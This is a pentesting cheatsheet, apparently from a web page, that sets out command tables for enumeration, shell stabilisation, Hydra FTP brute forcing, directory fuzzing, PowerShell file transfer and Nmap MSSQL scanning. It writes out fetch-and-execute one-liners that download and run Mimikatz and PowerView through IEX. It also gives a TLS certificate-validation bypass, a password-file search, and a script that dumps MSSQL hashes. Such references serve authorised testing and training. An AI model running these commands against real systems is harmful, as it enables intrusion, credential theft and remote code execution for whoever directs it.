General
Pentesting & Administration Cheatsheet¶
File Search & Enumeration¶
| Options | Commands | Description |
|---|---|---|
| Find SUID Files | find / -perm /4000 -type f 2>/dev/null | Search for files with the SUID bit set |
| Find Passwords in Windows Files | findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml | Search for files containing the word "password" on Windows |
| Tree without installing Tree | find "${1:-.}" -type d -print0 \| while IFS= read -r -d '' dir; do printf '\n== %s ==\n' "$dir"; ls -la -- "$dir" 2>/dev/null \|\| printf ' (error)\n'; done | Display directories tree without installing tree |
Shells & TTY¶
| Options | Commands | Description |
|---|---|---|
| Full TTY via Python | python3 -c 'import pty; pty.spawn("/bin/bash")' | Spawn a full TTY shell |
| Stabilize TTY Shell | CTRL+Z; stty raw -echo; fg; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; | Stabilize and enhance your TTY shell |
Brute Forcing¶
| Options | Commands | Description |
|---|---|---|
| Bruteforce FTP with Hydra | hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://{IP} | Bruteforce FTP login using Hydra |
| Bruteforce FTP with Hydra (User & Password Lists) | hydra -t 4 -l admin -P passwords.txt ftp://$target | Bruteforce FTP login using user and password lists with 4 threads |
Web Content Discovery¶
| Options | Commands | Description |
|---|---|---|
| FFUF Medium Directory Search | ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --ac -u http://{IP} | Use FFUF to discover directories on a web server |
Windows File Transfer¶
| Options | Commands | Description |
|---|---|---|
| Base64 File Write | [IO.File]::WriteAllBytes("path/to/file/to/write", [Convert]::FromBase64String("")) | Write a file to disk using Base64 encoded content in PowerShell |
| Download File via WebClient | (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>') | Download a file from a URL using PowerShell |
| Download File Asynchronously | (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>') | Download a file asynchronously using PowerShell |
| Download and Execute Mimikatz | IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') | Download and execute Mimikatz script via PowerShell |
| Invoke PowerView | Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1 | Download PowerView script using PowerShell |
| Bypass SSL/TLS Errors | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | Bypass SSL/TLS certificate errors in PowerShell |
| Use Basic Parsing for Invoke-WebRequest | Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX | Use basic parsing with Invoke-WebRequest to avoid Internet Explorer dependencies |
Nmap MSSQL Scripts¶
| Options | Commands | Description |
|---|---|---|
| MSSQL Nmap Enumeration | sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 [host] | Run multiple MSSQL-related scripts with Nmap |
| Add a route through a compromised machine |
File Transfer with SCP¶
| Options | Commands | Description |
|---|---|---|
| Copy File from Local to Remote | `scp /path/to/local/file user@remote:/path/to/remote |